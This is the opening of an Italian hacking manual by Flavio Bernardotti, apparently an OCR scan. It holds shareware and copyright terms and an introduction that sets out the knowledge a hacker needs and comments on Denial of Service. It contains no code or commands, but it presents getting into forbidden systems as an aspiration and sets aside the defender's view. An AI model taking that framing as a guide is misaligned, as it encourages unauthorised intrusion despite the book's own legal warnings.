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Q uanto costa il volume 

Iniziai a scrivere il primo volume legato alla programmazione in Linguaggio C a basso livello 
nell'anno 1986 durante il secondo anno relativo all'esperienza FIDO NET in Italia. 
// volume venne distribuito sperimentalmente sulla prima rete telematica pubblica la quale nel 
giro di pochi anni ebbe una diffusione enorme. 

Questo era il preambolo a quella che sarebbe stata l'evoluzione della telematica pubblica in 

Italiana ma allo stesso tempo fece in parte comprendere qual è l'atteggiamento degli italiani 

nei confronti di quello che era un concetto che era arrivato in Italia grazie alla FidoNet. 

Lo stesso software con cui gestimmo all'inizio la rete, FIDO di Tom Jennings, era distribuito in 

USA grazie a un modello che a quei tempi suonava strano qui da noi. 

L'infomatica domestica era agli albori in quanto erano solo due anni che era uscito il PC IBM, 

10 stesso che gestiva il mio BBS ovvero il Montecsatello BBS, il secondo nodo FIDONET 
italiano dopo quello di Giorgio Rutigliano di Potenza, uno dei sysop con cui aprimmo la rete 
qui in Italia. 

Le riviste mostravano il carattere intrallazzone italiano. 

Annunci del tipo: "Vendo e scambio 20.000 programmi originali.su floppies" erano presenti a 
centinaia. 

Moltissime case software USA si rifiutavano di esportare il software verso l'Italia in quanto era 
considerata uno dei paesi a più grosso rischio di pirateria informatica. 
D'altra parte cokme in tutte le cose anche nell'informatica dovevamo fare vedere a tutti che 
siamo italiani ovvero quel bricciolo più furbi degli altri. 

Italink, il software di gestione della rete FIDONET, da me scritto fu il primo esempio di come 
avrebbe putoto essere catastrofico il concetto di shareware in Italia. 

11 secondo tentivo lo mostro in un modo ancora più evidente. 

Il libro circolato in decine di migliaia di copie con sopra l'invito di fare un piccolissimo 
versamento di poche migliaia di lire non fece arrivare se non un versamento fatto dla'tra parte 
di un amico di Torino, Sergio Villone ricercatore presso il centro di ricerca della Telecom, 
allora SIP, di Torino. 

Nella convinzione che gli anni avessero portato ad una maturazione del concetto di 
shareware mi porto a scrivere diversi altri volumi sulla programmazione in diversi linguaggi 
compreso Java. 

Anche in questo caso l'offerta richiesta era microscopica eppure neppure in quasto caso la 
risposta fu molto maggiore. 

Molte persone a cui era stato preannunciato un metodo diverso di distribuzione mi hanno 
accusato di voler diventare ricco mediante la scrittura di voluminon capendo ch3e neppure 
pubblicandolo uno avrebbe potutto diventare ricco. 

Anche se un casa editrice si prendesse la briga di pubblicare un volume di questo tipo 
l'importo ricavato sarebbe sempre microscopico a confronto del lavoro ce la stesura richiede. 
Un volume potrebbe essere pagato circa 5.000€. 

Pensate solo al tempo di cercare le informazioni, di studiarle, di applicarle, di scriverle .... 

La scrittura di un volume di programmazione pura pretende una metodologia differente da 

quello che potrebbe essere un volume come questo. 

In quel caso la scrittura avviene mettendo su carta dei concetti legati alla conoscenza del 
linguaggio che una persona possiede. 

In questo caso oltre alla scrittura di concetti conosciuti esiste anche un grosso lavoro di 
ricerca in quanto alcune cose in genere non sono mantenute a memoria e basta. 
Prendete ad esempio le centinaia di stringhe usate per l'applicazioni degli exploit legati ai vari 
BUGS come l'Unicode. 

E' chiaro che deve esistere un grosso lavoro di ricerca e quindi d'uso di certe risorse. 

Il solo aggancio che possiedo per la connessione alla rete è un HDSL a 2 MB pienoi che 

possiede un costo di circa 20000€ annuali. 

Tutto questo per dire che non esiste il discorso di voler diventare ricchi ma semplicemente di 
concorrere alle spese sostenute per la creazione di un volume di 1500 pagine circa. 
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I riformazioni sul copyright 

II seguente volume può essere distribuito ma la sua stampa e l'uso di questo deve essere 
supportato da un offerta d'importo libero. 

L'esecuzione di un off erta è obbligatoria e da diritto a essere iscritti ad una MAI L LI ST 
privata in cui verranno rilasciate informazioni relative ai continui aggiornamenti del 
volume. 

Inviando un offerta a : 

BERNARDOTTI FLAVIO Via Trento, 10 15040 Montecastello (Al) 

Tel. 380 7097051 

HackersBook@crackinguniversity2000.it 

ricordatevi di inserire la vostra casella postale la quale verrà utilizzata per inviarvi gli 
aggiornamenti (almeno uno al mese). 

L'invio di 1 5€ da diritto a ricevere il CD con all'interno anche tutte le utility tra le quali i 
compilatori, i sistemi di sviluppo (freware), i documenti RFC, i database di exploits e tutte le 
altre descritte dentro al testo. 

La pubblicazione su sito WEB e la sua distribuzione mediante reti telematiche deve essere 

espressamente richiesto e autorizzato. 

La pubblicazione su CD commerciali non è consentito. 

I sorgenti riportati sono espressamente di pubblico dominio e i vari copyright riportati non 
possono essere modificati rimando in ogni caso legati ai vari autori. 

II volume non deve essere usato in corsi di aziende o per qualsiasi uso che non sia la pura 
didattica personale non all'interno di corsi a pagamento. 

Qualsiasi modifica delle diciture di copyright sarà considerata una violazione rispetto alle 
attuali leggi vigenti in Italia. 




Flavio Bernardotti 
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Spesso il lati oscuri delle cose suscitano grossi interessi in quanto il fato di essere 
potenzialmente in grado di sottomettere i sistemi altrui permette di soddisfare quell'inconscio 
senso di rabbia che probabilmente tutti possediamo a causa delle massificazione che la 
società svolge sugli individui. 



I ntroduzione 

Partiamo subito da uno dei punti chiave di tutto il volume e precisamente quello ce stabilisce 
che cosa vi potete aspettare da questo volume e quello che invece non vi dovete attendere di 
ricevere. 

Spesso nell'inconscio delle persone esiste quella recondita speranza che li porta a credere 
che possa esistere una specie di bacchetta magica che possa in qualche modo aprire le porte 
di tutti i sistemi. 

Miti come Kevin Mitnick's sono nati intorno al concetto che porta quasi a pensare che per 
questi non esista di fatto nessuna limitazione e che quindi non possa esistere un sistema in 
grado di resistere davanti a loro. 

Ricordiamoci di una cosa e che questo di fatto rimanga sempre ben chiaro: NON ESISTE 
UNA BACHETTA MAGICA NEL CAMPO DELL'HACKING E LA FORTUNA INCIDE AL 50% 
INSIEME ALLE CAPACITA ! 

Non che questa definizione voglia indurre a pensare che le capacità non contino, al contrario 
sono importantissime, ma comunque una buona dose di fortuna semplifica enormemente la 
vita. 

Da questo volume quindi non dovrete aspettarvi la fatidica bacchetta magica ma 
semplicemente una buona dose di conoscenze che vi semplificheranno la vita nelle vostre 
operazioni. 

Ricordiamoci inoltre che le informazioni che l'hacker può utilizzare per accedere ai sui sistemi 
vittima aumentano di giorno in giorno per cui seguire regolarmente l'evoluzione dei database 
di news legate alla sicurezza è una delle attività principali che devono essere eseguite. 
Le notizie fornite in questo volume coprono a 360 gradi tutte quelle che dovrebbero essere le 
conoscenze dell'hacker ed inoltre vengono trattate in modo tale da essere considerate 
accessibili anche al nuovo addetto il quale generalmente non dispone di una cultura 
informatica tale per poterle by-passare completamente. 

Spero che il senso del volume non sia solo quello in cui i "sapientoni" dell'informatica lo 
utilizzeranno per dimostrare che loro sono superiori a quello riportato in quanto io 
personalmente accetto i confronti di una cosa "fatta" con un'altra cosa "fatta". 
Coloro che criticano il "fatto" senza "fare" non sono degni di considerazione in quanto la 
distribuzione dei miei volumi ha sempre posseduto come obbiettivo quello di permettere ad 
altre persone di scambiarsi le proprie esperienze per cui al limite chi si pensa superiore al 
livello del libro può sempre cercare qualche cosa di superiore o al limite può fare lui 
direttamente qualche cosa in modo tale che anche gli altri possano condividere il loro 
bagaglio di conoscenze. 

In molti settori il nozionismo fornito è superficiale ma in ogni caso sufficiente per il suo utilizzo. 
Ricordiamoci anche di una cosa. 

II settore è immenso e scrivere un libro in cui venga riportato tutto pretenderebbe decine di 
migliaia di pagine oltre a chiaramente un tempo immenso per la loro scrittura. 

In questo volume al contrario di molti altri in circolazione, non verranno riportate le soluzioni al 
problema descritto. 

Molti libri vengono editati tenendo il punto di vista dell'amministratore sempre in primo piano. 
In questo caso questo punto di vista verrà completamente ignorato e quindi sarà compito del 
sysadmin andarsi a cercare in rete le soluzioni relativamente ai sistemi operativi e 
all'hardware dei loro computers. 

In moltissimi casi i softwares forniti vengono riportati integralmente mentre in altri viene solo 
citato il links a cui è possibile trovarlo. 

Non tutti i softwares sono di mia creazione e spesso sono invece programmi che 
rappresentano dei capisaldi nell'ambito di quello che svolgono. 

Ad esempio MSADC.PL è uno dei programmi ritrovabili in rete utilizzati per testare il BUG 
MSADC o RDS. 

Quella di essere un hacker è sicuramente uno degli attributi a cui uno ambisce di più in 
campo informatico. 

Essere programmatore è poi sicuramente al secondo posto come ruolo ambito. 
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Unire l'hacking con la programmazione è sicuramente il massimo della vita ! 
Scherzi a parte possiamo dire che generalmente il fatto di programmarsi direttamente le 
proprie Utilities significa conoscere a fondo le teorie su cui certi principi si basano oltre al fatto 
che sicuramente questo rappresenta un grosso vantaggio in quanto non dobbiamo sottostare 
alle disponibilità delle rete. 

In circolazione possiamo trovare un numero esagerato di volumi che spiegano i principi 
fondamentali dell'hacking ma quasi tutti si fermano quando si arriva a dover vedere dal punto 
di vista della progettazione di moduli software che sfruttando determinate librerie esplicano 
certe funzionalità in questo ambito. 

Moltissime persone denunciano il loro interesse nei confronti di queste metodologie ma quasi 
sempre non possiedono tutte quelle conoscenze che sarebbero necessarie anche solo a 
livello di conoscenza di base. 

Tutte le argomentazioni possono evolversi con il tempo ma in ogni caso un infarinatura di 

base rimane necessaria. 

Per fare un esempio possiamo parlare di Unix. 

Supponiamo che utilizzando un qualsiasi programma chiamato "BacchettaMagica" prelevato 
dalla rete riusciamo ad introdurci dentro ad un sistema Linux. 

Se non conosciamo neppure quei comandi per richiedere la directory del punto dove siamo 
entrati, che cosa facciamo dopo ? 
Spegniamo il modem e andiamo al bar ! 

Fare hacking significa conoscere tutte le argomentazioni che si vanno a toccare ovvero : 



concetti legati alla strutturazione delle reti 
concetti legati ai protocolli di comunicazione 
concetti legati all'hardware dei sistemi 
concetti legati ai sistemi operativi 
concetti legati ai vari software di gestione servers 
concetti legati ai software di gestione delle reti 
concetti legati all'uso di librerie di programmazione 
concetti legati alla programmazione 
concetti legati alla sicurezza delle reti 



Insomma. 

Bisogna conoscere un po' di tutto ed in mezzo a queste cose bisogna saper individuare le 
strade giuste per arrivare a destinazione. 

Premettiamo che questo volume non vuole essere un enciclopedia ma soltanto un punto di 
riferimento per tutti quelli che desiderano avere una base da cui iniziare a lavorare per crearsi 
il proprio bagaglio culturale in merito di hacking. 

Sul volume verranno trattate moltissime argomentazioni ad un livello sufficiente per 
permettere alle persone di applicare tali principi senza necessariamente porsi il ruolo del 
trattato. 

I concetti di base della programmazione sono soltanto a livello di base per cui chiunque 
volesse approfondire in seguito tali argomentazioni potrà farlo mediante altri volumi più 
specializzati. 

Lo stesso dicasi per quanto riguarda la gestione dei sistemi operativi e di certe librerie e tools 
di sviluppo. 

A chi è rivolto questo volume ? 

Diciamo che non esiste una categoria specifica in quanto potrebbe andare bene a chi inizia 
ma allo stesso modo anche per chi ha già conoscenze in merito. 

La visione del tutto è legato ai sistemi di rete medi ovvero quelli che da circa 3 anni gestisco 

in WEBSITEK.COM e quindi vengono descritti anche sistemi di gestione che non sono 

presenti su sistemi home come ad esempio per quanto riguarda le strutturazioni tramite 

sistemi active directory delle intranet, la gestione dei servers DNS e cosi via. 

Per quanto riguarda la definizione delle persone che vorrebbero diventare hacker siamo sul 

generico. 

Qualsiasi persona per i motivi suoi potrebbe ambire a diventare come tale. 

In ogni caso anche il semplice fatto di essere un 'Hacker' è importante in quanto su questo 

discorso, a livello psicologico, si potrebbe scrivere un trattato anche se poi alla fine del tutto 
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questo termine è particolarmente ambito in quell'età in cui già nella normalità si possiede un 
istinto rivoluzionario e precisamente nell'età adolescenziale e post-adolescenziale. 
L'hacker del terzo millennio è di fatto quella persona che possedendo capacità e nozioni 
maggiori della norma riesce a sfruttare la rete per eseguire scorribande all'interno di sistemi a 
cui normalmente l'accesso risulta essere vietato. 

Spesso si pensa all'hacker come a quella persona che si inserisce dentro a sistemi di banche 
per accreditarsi sul proprio conto cifre cospicue o che magari, come ci hanno fatto vedere in 
alcuni films, entra in qualche computer di società di viaggio per prenotarsi viaggi in posti 
caratteristici del nostro mondo. 

Tanti anni fa, nel periodo del 68, esistevano alcuni individui che sostenevano filosofie legate 
all'uso di alcune droghe come ad esempio nel caso del LSD. 

Le stesse persone a distanza di anni hanno spostato i filoni filosofici verso teorie molto più 
adatte ai nostri tempi come quella della Cybercultura. 

Sto parlando di T. Leary autore negli anni 60 della famosa guida psichedelica "Il grande 
sacerdote" che pochi anni prima di morire, dopo aver trasmesso in diretta la sua morte su 
Internet, fece uscire un volume intitolato "Chaos e cybercultura" nel quale veniva definita la 
filosofia di quelli che avrebbero dovuto essere i Cybernauti. 

Tutta questa filosofia era basata sul concetto di CHAOS che non sto a descrivere in questo 
volume ma che in ogni caso tra le tante altre cose concepisce l'individuo come una persona 
che tende ad espandere se stesso sfruttando l'alterazione sensoriale offerta da alcune 
droghe e usando la rete come metodo per giungere alla conoscenza. 

Il Cybernauta era una versione un po' più psichedelica di quello che è normalmente definito 
come hacker, ovvero un navigatore del Chaos in grado di accedere a qualsiasi punto della 
rete grazie alle sue notevoli conoscenze e capacità tecniche. 

D'altra parte la rete internet viene definita come il "villaggio globale" ovvero un mondo virtuale 
parallelo al nostro che sarà sempre di più simile man mano che le tecniche di 
rappresentazione diventeranno sempre maggiormente raffinate. 

Già adesso si notano i tentativi di creazione di WEB 3D virtuali usati ad esempio per la 
creazione di CHAT o altri sistemi di questo tipo. 

Chiaramente pur essendo l'informatica una delle scienze che ha subito un evoluzione più 
veloce delle altre comunque in ogni caso sono solo cinque o sei anni che abbiamo messo nel 
cassetto i modem a 14 KB a favore di linee molto più veloci ed affidabili come nel caso delle 
nuove linee ADSL. 

L'aumento della velocità nei trasferimenti di rete e i sistemi sempre più potenti permetteranno 
entro pochi anni la creazione di servizi di rete immaginabili. 

Chiaramente il software non è da meno in quanto queste due strutture più potenti unite con 
software sempre più raffinati permetteranno di considerare sempre di più la rete come un 
mondo reale. 

Anche su questo punto esistono alcuni warnings lanciati dagli psicologi i quali denunciano 
sempre maggiormente i pericoli che un uso ossessivo della rete potrebbe arrecare negli 
individui che ne abusano. 

Ma anche in questo caso non è nostro compito discutere su questo problema. 

Una cosa su cui tutti si trovino d'accordo è quella di definire gli hackers come persone che 

possiedono capacità tecniche maggiori della norma. 

Il mondo internet non è l'informatica totale ma di fatto se l'informatica è conoscenza la rete è il 
mezzo per raggiungerla. 

Anni fa quando creammo in Italia la rete FidoNet l'interesse che mi aveva spinto a buttarmi in 
quell'impresa era solo parzialmente tecnico in quanto per la maggior parte quello che mi 
attirava di più era il pensiero che da qualche parte geograficamente remoto a dove abitavo io 
ci potessero essere persone che avevano già fatto le esperienze in cui mi stavo cimentando 
e quindi il fatto di riuscire a contattarle e a comunicare con loro sarebbe servito ad accelerare 
il mio lavoro e viceversa. 

La rete di fatto è un meccanismo complesso per la condivisione di risorse sulla quale, proprio 
grazie al suo metodo di trasferimento delle informazioni, possono essere presenti dati 
testuali, filmati e suoni ovvero quello che si definisce con il termine di multimedialità. 
Distaccandosi un attimo da quello che potrebbe essere l'immagine mentale delle cose che 
transitano su questa potrebbe essere ovvio il fatto che su un sistema composto da .milioni di 
computers deve necessariamente esistere un meccanismo che dovrebbe permettere il 
trasferimento di pacchetti di informazioni da un sistema di origine ad un sistema di 
destinazione passando da un certo numero di sistemi di transito. 
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Quindi la realtà di quest'ambiente è composto di fatto da due entità e precisamente i sistemi 
che compongono la rete e il meccanismo di trasferimento delle informazioni. 
L'hacker deve possedere informazioni sufficientemente buone per tutte e due le componenti 
di Internet. 

Nel primo caso, quello dei sistemi computerizzati, ci troviamo davanti ad un mondo 
complesso in cui entrano in gioco diverse componenti. 

Fino a qualche anno fa i computers erano considerabili come la somma di due parti e 
precisamente l'hardware e il software che potevano essere viste in un modo più o meno 
semplice ma senza dover eseguire molte successive suddivisioni. 

L'evoluzione delle tecnologie ci ha portato al giorno d'oggi a dover considerare della ulteriori 
componenti in questi due ambiti e allo stesso tempo, mentre una volta l'entità di rete poteva 
essere vista come una cosa a parte, è necessario considerare questa in un modo non 
scindibile dalle prime due. 

Dal 1982 fino al 1993 circa potevamo considerare la piattaforma hardware come lo strato di 

base di tutto il sistema sul quale il BIOS offriva una prima stratificazione software necessaria 

a permettere il colloquio tra i nostri programmi e le varie componenti elettroniche. 

I sistemi operativi usando le funzioni presenti in questa parte del sistema, il BIOS, e 

aggiungendo su queste altre funzionalità proprie offrivano la base sulla quale i linguaggi di 

programmazione potevano basarsi per la scrittura di tutte le funzioni eseguite dai programmi 

usati. 

Con il passare degli anni le funzionalità inserite nei sistemi operativi sono diventate sempre 
più sofisticate adatte a gestire finestre di dialogo con gli utenti sempre più complesse, 
funzionalità di aggancio ai database sempre maggiormente potenti ed in particolar modo il 
sistema operativo stesso è diventato sempre di più un collante per unire le funzionalità offerte 
a livelli superiori da software relativi a servers vari come nel caso dell'ambiente Windows. 
Nell'ambito degli OS gli ultimi anni hanno marcato sempre maggiormente una rivalità tra i 
sistemi operativi Windows e quelli basati su Unix. 

La discussione sul qual è migliore è infinita e penso che non avrà mai termine. 
Da una parte gli studenti che provenendo da Università, in cui già alcuni esami utilizzano Unix 
come base questo, portano avanti a spada tratta il fatto che Unix come sistema operativo è 
migliore sia come stabilità che come sicurezza in un ambito di rete. 

Dall'altra parte i professionisti commerciali che dovendosi basare su fattori di richiesta 
portano avanti la superiorità di Windows rispetto a quella di Unix. 

Purtroppo spesso ci si dimentica che si tratta di fatto di due sistemi completamente differenti 
difficilmente paragonabili tra di loro. 

Microsoft nella ricerca di un sistema che offrisse dei meccanismi in background che 

permettessero certi tipi di funzionalità da inserire in certi software, come ad esempio Office, 

hanno creato un sistema di una complessità elevatissima e come tutti sanno più è complesso 

il software maggiori possono essere i problemi funzionali e di sicurezza. 

Unix si supporta su di una filosofia molto più semplice dal punto di vista filosofico e 

tecnologico. 

Mentre Windows dispone al suo interno un certo numero di strati software come ad esempio 
quello costituito dalla tecnologia OLE su cui si basano tecnologie più superficiali a partire da 
ActiveX per giungere ai più recenti frameworks come ad esempio quelli relativi a .NET, Unix 
dispone di un Kernel molto più semplice in cui sono implementati i drivers che permettono il 
colloquio con le periferiche e su questo si basano un certo numero di funzionalità presenti 
come file eseguibili a se stanti all'interno dell' OS. 

Chiaramente questa maggiore semplicità teorica si traduce in una maggiore stabilità del 
sistema operativo stesso e forse, sottolineo forse in quanto di questo non ne sono molto 
convinto, anche in una maggiore sicurezza. 

Come dicevamo prima negli ultimi anni il DNA delle reti è entrato nell'informatica facendo si 
che questa subisse una grossa trasformazione. 

Anni fa l'informatica delle grosse aziende era costituita nella maggior parte in grossi sistemi 
quelli definiti con il termine di mini e di mainframe. 

La condivisione delle risorse tramite rete ha portato ad un decentramento delle funzioni legate 
al processo delle informazioni stesse favorendo la crescita di quelle che sono le intranet 
aziendali. 

Le reti geografiche hanno successivamente funzionato da collante per le varie reti locali 
permettendo la trasmissione tra siti remoti di informazioni. 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



Internet ha preso un parte grossa di questa realtà in quanto costituisce la connettività a basso 
costo permettendo inoltre l'implementazione di funzionalità pubbliche ovvero rivolte verso un 
grosso numero di utenze esterne. 

La definisco come connettività povera in quanto le grosse aziende prima dell'espansione di 
Internet utilizzavano quasi esclusivamente sistemi di collegamento basati su linee dedicate a 
costi molto elevati. 

Chiaramente il costo prende una fisionomia nell'istante in cui è confrontato con il costo 
globale del sistema informativo. 

In altre parole se si è speso una decina di milioni per l'acquisto di un paio di personal 
computers, spendere cifre che superano i 50 milioni solo per una linea dati potrebbe risultare 
smisurata come spesa. 

La cosa cambia se questa viene riferita ad investimenti legati all'informatizzazione che 
superano le centinaia di milioni. 

In ogni caso non è comunque solo un fatto di spesa, anche se questa molte volte non può 
essere ignorata, ma anche di nuovi servizi offerti nei confronti di persone esterne all'azienda 
come ad esempio clienti o persone che posseggono gli stessi interessi ai quali si vogliono 
offrire gli accessi al patrimonio di risorse proprie. 

Sono proprio queste risorse a cui gli hackers tendono ad accedere certe volte solo per sfida e 
altre invece per scopi che scaturiscono puramente dall'irresponsabilità delle persone. 
Il discorso sull'etica degli hackers è lungo e complesso e in ogni caso non verrà portato avanti 
in questo volume. 

L'unica considerazione che voglio fare riguarda un semplice consiglio che voglio dare a chi si 
accinge a leggerlo. 

In altre parole io ritengo che essere hacker significa innanzi tutto portare avanti giorno dopo 
giorno una sfida a se stessi. 

Comprendere le cose è un fatto che pretende tempo e spesso la maggiore difficoltà la si trova 
nel proprio senso d'impazienza che soventemente ci spinge ad abbandonarla ancora prima di 
averla conclusa o che ci porta affrontarla con un senso di fretta ce come unica finalità ci 
porterà a crearci dei concetti errati o comunque vacillanti. 

La pazienza in questo campo ha il ruolo della regina e l'esperienza è in ogni caso non una 
questione ne di giorni e ne di mesi ma di anni. 

Valutarsi eccessivamente è una mala cosa mentre avere dei miti e degli obiettivi da 
raggiungere è sicuramente il più saggio sistema per affrontare il lungo viaggio verso le 
conoscenze di questo settore. 

Raggiungere una meta è quasi impossibile, e questo non lo dico per scoraggiare, in quanto le 
tecnologie al giorno d'oggi viaggiano sempre di più verso la velocità della luce per cui 
nell'istante in cui si pensa di aver raggiunto il traguardo questo di fatto si è già allontanato e 
una montagna di nuovi concetti si sono già messi tra noi e questo. 
Ne è un esempio pratico la comparsa della filosofia Microsoft legata a .NET. 

I livelli di sicurezza presenti nelle reti come Internet erano fino ad oggi critici e delicati tanto da 
dover optare per la traduzione delle risorse in pagine di un certo tipo che l'utente leggeva 
tramite un browser. 

In altre parole le risorse non venivano offerte a livello direttamente ma al contrario specifici 
programmi presenti sui servers le filtravano creando con i dati ricavati da queste funzioni delle 
pagine le quali venivano offerte agli utenti. 

La filosofia .NET ha portato a sofisticare il meccanismo della sicurezza a tal punto che la sua 
implementazione dovrebbe permettere l'accesso diretto alle risorse in un ambito di rete. 
Infatti su sistemi come Windows 2000 nella internet management console esisteva la 
possibilità di creare sul server un nuovo sito WEB. 

In Whistler che possiede già il .NET framework internamente nella stessa utility possiede 
anche la possibilità di creare una nuova applicazione inline. 

Tutto questo per portare l'esempio di quelli che intendevo come infinità di nuovi concetti che 

giorno dopo giorno si sommano a quello che uno cerca di apprendere. 

Una piccola divagazione psicologica la si può fare su quelli ce sono le emozioni umane. 

II senso egocentrico naturale in tutte le persone porta queste a cercare di avere delle 
gratificazioni da parte della società che ci circonda. 

Il computer è un sistema di auto soddisfazione perfetto anche se molti psicologi mettono in 
guardi ne confronti di questo pericolo. 
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La consapevolezza di superare se stessi giorno dopo giorno deve costituire un motivo per 
stringere i pugni ed andare avanti aggiungendo sempre maggiori conoscenze al nostro 
bagaglio. 

Per quanto riguarda invece la documentazione a disposizione in libreria devo dire che ho 
subito diverse delusioni. 

Il fatto che spesso la gente pensi che gli hacker dispongano della chiave magica per entrare 
nei sistemi altrui è sicuramente un luogo comune falso in quanto l'accesso ad un sistema 
viene eseguito mediante giorni e giorni dedicati allo studio di questi. 

In ogni caso moltissimi libri esagerano in quanto volumi che riportano come titolo 'Hackers 
Secrets' il massimo che arrivano a dire è che utilizzando gli scanners è possibile individuare 
se su un sistema sono aperte delle porte legate a certi protocolli. 

Una cosa che sicuramente verrà contestata in questo volume sarà legata al fatto che una 
piccola parte è legata alla programmazione. 

Come abbiamo appena detto fare l'hacker significa prendere in esame dei sistemi per giorni e 
giorni e quindi, dopo aver raccolto tutte le informazioni, è necessario applicare certe tecniche 
per cercare di accedere alle risorse di questi. 

Il primo scopo per cui diventa necessario saper programmare è sicuramente legato al fatto di 
riuscire a scriversi alcune applicazioni che possano servire a determinati scopi. 
In ogni caso questo non è il motivo principale in quanto il fatto di saper usare determinate 
librerie collegate a certe funzioni significa capire a fondo il funzionamento di certi principi. 
Prendiamo ad esempio il fatto di scriversi un programma di PING. 

Questa metodologia che permette di sviluppare software che svolge la funzione di PING o di 

TRACE è legata all'uso di determinati comandi prensenti nel protocollo ICMP. 

E' inutile dire che la conoscenza di tali librerie permette di inserire dentro agli stessi software 

serie di funzioni che collaborano insieme al raggiungimento di un certo risultato. 

Il lavoro fatto per la scrittura di questo volume è sicuramente quello più pesante fatto 

nell'ambito della scrittura di tutti gli altri volumi in quanto l'argomentazione trattata è immensa 

e copre praticamente tutti gli aspetti dell'informatica. 

Ilo volume parte trattando le teorie legate a certi aspetti della programmazione in Linguaggio 
C. 

Chiaramente la scelta del linguaggio C è stata obbligatoria in quanto l'ambiente dell'hacker è 
quasi forzatamente Linux grazie alla quantità di Utilities e di librerie disponibili già di default 
dentro al sistema anche se poi alla fine molte di queste sarebbero disponibili anche ijn 
ambiente Windows. 

Chiaramente non si tratta di un trattato di programmazione ma solo di un introduzione che vi 
permetterà di comprendere la scrittura di certe Utilities agganciate ad alcune librerie. 
Altri argomenti trattati sono legati alla gestione delle reti sia dal punto di vista della loro 
configurazione che da quello della loro gestione tramite protocolli. 

Questi ultimi vengono da prima trattati in modo globale e poi successivamente verranno visti 
ad uno ad no perlomeno quelli principali. 

Di questi verranno viste le strutture ed in particolar modo verranno trattatre alcune librerie che 
permettono la manipolazione dei pacchetti. 

Legati alle reti vengono inoltre visti i principi di funzionamento dei DNS, dei vari servers e di 

altre strutture di controllo come ad esempio quelle lagate alle funzionalità di indirizzamento. 

Tra le librerie viste troviamo WINSOCK, LIBNET, TCPDUMP, WINDUMP, WINCAP. 

La programmazione servirà inoltre a scriversi programmi per eseguire funzioni di spoofing e 

altro. 

Per questo motivo all'interno del volume verrà vista la creazione di une serie di classi 
mediante le quali sarà poi possibile scrivere moduli software in modo semplice senza dover 
utilizzare tutte le volte le librerie WINSOCK 2 sulle quali queste si basano. 
Voglio sottolineare che di fatto non tratteremo funzioni in modo ripetuto ma ne selezioneremo 
soltanto una per ciascun scopo. 

Ad esempio Winsock non dispone di funzioni per il capture di pacchetti per cui queste funzioni 
verranno trattate tramite librerie come WINDUMP e WINCAP. 

Un ultima divagazione riguarda il sistema per l'ottenimento di queste ed di fatto un consiglio 
puramente tecnico che voglio dare ma che quasi sicuramente già tutti conoscono. 
Partite dal presupposto che qualsiasi sia no i vostri interessi sicuramente su Internet troverete 
montagne di materiale. 

Per ricercarlo esistono i motori di ricerca ma ci sono anche programmi che sfruttando le 
funzionalità offerte da questi permettono di eseguire ricerche più dettagliate e precise. 
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Acuni programmi come ad esempio Copernic, BullsEye, PgWEB e Bingooo sono in grado di 
scegliere a seconda degli argomenti ricercati i motori di ricerca più idonei e quindi di inviare 
su questi le voci utilizzate come filtro. 

Dopo aver ricevuto le risposte le valutano filtrando al limite i links non più esistenti e 
permettendo successivamente di navigare sulle pagine delle risposte senza uscire dal 
programma di ricerca. 

Quasi tutti questi programmi sono gratuiti come ad esempio Copernic che è prelevabile da 
http://www.copernic.com . 

Chiaramente l'uso della lingua inglese è essenziale per la rete in quanto le informazioni 
presenti in lingua italiana sono un decimo rispetto a queste per cui un perfezionamento della 
lingua potrebbe essere utile. 

Un ultima precisazione che voglio fare è che questo libro spiega determinate cose al fine di 
creare un cultura legata a queste argomentazioni ma che in ogni caso, nell'istante in cui 
verranno descritte le metodologie di hacking, lo scopo non sarà solo quello di permettere ad 
alcune persone di eseguire danni in giro per la rete ma al contrario verranno anche presentati 
i metodi che costituiscono le contromisure. 

Questo è un testo tecnico e non uno di guerriglia nel cyberspazio per cui un invito al 
mantenimento di una certa etica lo devo necessariamente fare. 

Un cosa di cui è sempre meglio ricordarsi è che violare gli accessi di sistemi su reti senza 
possedere i permessi significa correre il rischio di incorrere in gravissime sanzioni penali. 
Fate attenzione anche al fatto che spesso l'uomo quando tende a confrontarsi con quelli che 
potrebbero essere gli eventi sgradevoli della vita è portato a pensare di essere immune a 
queste cose e che quindi di fatto queste capitano solo agli altri. 

Ricordatevi che noi siamo gli "altri" rispetto ad altri individui e che quindi certe cose 
potrebbero benissimo capitarci. 

Quando uno al suono del campanello di casa da parte dei Carabinieri pensa di potergli dire 
che lui non immaginava potrebbe sentirsi rispondere che da quel momento potrebbe anche 
avere 7 anni di tempo per convincersi del contrario senza considerare che se nell'esecuzione 
di un accesso non autorizzato uno crea anche dei danni, oltre al fatto penale, potrebbe 
trovarsi a dover rifondere anche centinaia di milioni di danni. 

La sola reinstallazione di un software per la gestione di un cluster costa in media 2000 € per 
ogni giorno d'intervento dei tecnici. 
Quindi meditate gente .... meditate. 



Le varie facce dell'hacking 

Fare hacking potrebbe significare tante cose o meglio potremmo dire che l'hacking per se 
stesso possiede un certo numero di specializzazioni ciascuna delle quali possiede una 
metodologia per la sua esecuzione e una certa finalità. 

L'uomo possiede tra le sue varie componenti una che che rappresenta il suo livello di 
'rompiscatolaggio' per cui essendo l'hacking un espressione dell'uomo anche una di queste 
metodologie ha solo come obbiettivo quello di creare danni a livello di interruzione dei servizi. 
Alcune tecniche possiedono come scopo quello di occupare tutte le risorse di un sistema 
mandandolo in crisi. 

Ad dire il vero questo non sarebbe l'unico scopo della tecnica in quanto quella originale 
dovrebbe essere quella di azzittire un host per potersi sostituire a quello originale. 
Purtroppo le metodologie usate per fare inceppare un sistema vengono usate spesso solo per 
quello scopo. 

Moltissime volte gruppi di hacker si mettono insieme e colpiscono lo stesso obbiettivo al fine 
di consumare un livello di memoria molto maggiore. 

Queste metodologie sono quelle conosciute con il termine Ddos ovvero Denial of Service. 
Sinceramente non nutro particolare simpatia sull'esposizione di determinate metodologie in 
quanto queste sono quelle che generalmente nelle mani sbagliate servono solo a creare 
pasticci. 

Di fatto sono utili se abbinate ad altre procedure in alcune attività come ad esempio quando si 
cerca di sostituirsi a qualche sistema considerato come sicuro in qualche file di 
configurazione di rsh. 

Il fatto di utilizzare una di queste tecniche in relazione al fatto di silenziare un host lo posso 
capire ma purtroppo il suo uso generalmente ha soltanto uno scopo vandalistico. 
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Ultimamente ho visto sulla rete quello che non mi sarei mai aspettato di vedere ovvero azioni 
senza senso perpetuate da alcune persone per le quali fare l'affermazione che hanno il 
cervello dentro ai piedi sarebbe completamente errato in quanto questa farebbe presupporre 
che queste da qualche parte un qualche cosa di simile al cervello lo abbiano quando di fatto 
